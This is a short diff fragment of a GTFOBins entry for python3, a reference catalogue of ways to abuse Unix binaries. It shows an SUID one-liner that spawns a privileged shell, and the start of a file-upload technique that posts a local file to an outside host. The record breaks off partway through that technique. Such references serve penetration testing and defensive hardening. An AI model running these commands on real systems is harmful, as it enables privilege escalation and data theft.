GTFOBins/GTFOBins.github.io/_gtfobins/python3.md

   suid-enabled:
     - code: ./python3 -c 'import os; os.system("/bin/sh -p")'
   upload:
     - description: Send local file via "d" parameter of a HTTP POST request.
+Run an HTTP service to collect the file on the other end.
       code: |
         export URL=http://10.0.0.1/
         export LFILE=file_to_send